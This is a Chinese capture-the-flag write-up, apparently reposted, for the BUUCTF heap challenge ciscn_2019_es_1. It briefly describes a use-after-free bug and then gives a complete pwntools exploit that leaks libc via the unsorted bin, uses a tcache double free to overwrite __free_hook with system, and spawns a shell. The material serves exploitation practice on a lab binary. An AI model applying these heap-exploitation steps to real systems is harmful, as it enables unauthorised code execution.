[BUUCTF]-PWN:ciscn_2019_es_1解析(tcachebin duf)

news2024/11/24 10:44:32

查看保护

再查看ida

大致为alloc创建堆块，free释放堆块，show输出堆块内容

但是要注意一点free没有清空堆块指针

完整exp：

from pwn import*
from LibcSearcher import*
p=process('./es1')
p=remote('node5.buuoj.cn',26841)

def alloc(size,content1,content2):
    p.sendlineafter(b'choice:',str(1))
    p.sendlineafter(b'name',str(size))
    p.sendafter(b'please input name:',content1)
    p.sendafter(b'please input compary call:',content2)
def show(index):
    p.sendlineafter(b'choice:',str(2))
    p.sendlineafter(b'Please input the index:',str(index))
def free(index):
    p.sendlineafter(b'choice:',str(3))
    p.sendlineafter(b'Please input the index:',str(index))

alloc(0x80,b'aa',b'bb')
alloc(0x20,b'aa',b'bb')
alloc(0x80,b'/bin/sh\x00',b'dd')
for i in range(0,8): #连续释放，填充tcachebin
    free(0)
show(0) #没有删除堆块指针，所以可以直接输出
mainarena96=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print(hex(mainarena96))
mainarena=mainarena96-96
mallochook=mainarena-0x10
print(hex(mallochook))
libc=LibcSearcher('__malloc_hook',mallochook)
libcbase=mallochook-libc.dump('__malloc_hook')
freehook=libcbase+libc.dump('__free_hook')
system=libcbase+libc.dump('system')
binsh=libc.dump('str_bin_sh')
free(1) #利用tcachebin可以double free的性质，进行任意地址创建堆块
free(1)
alloc(0x20,p64(freehook),b'aa')
alloc(0x20,p64(0),b'aa')
alloc(0x20,p64(system),b'aa')
free(2)
p.interactive()

补充点1：在最后的两次free堆块1那里要注意堆块的大小，堆块大小为0x10来解题会费很大力气，因为在创建堆块的时候程序还会malloc一个大小为0x18的堆块，调试解题就会很困难，非常不建议这样设置，比如可以像这里一样设置为0x20

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1451930.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！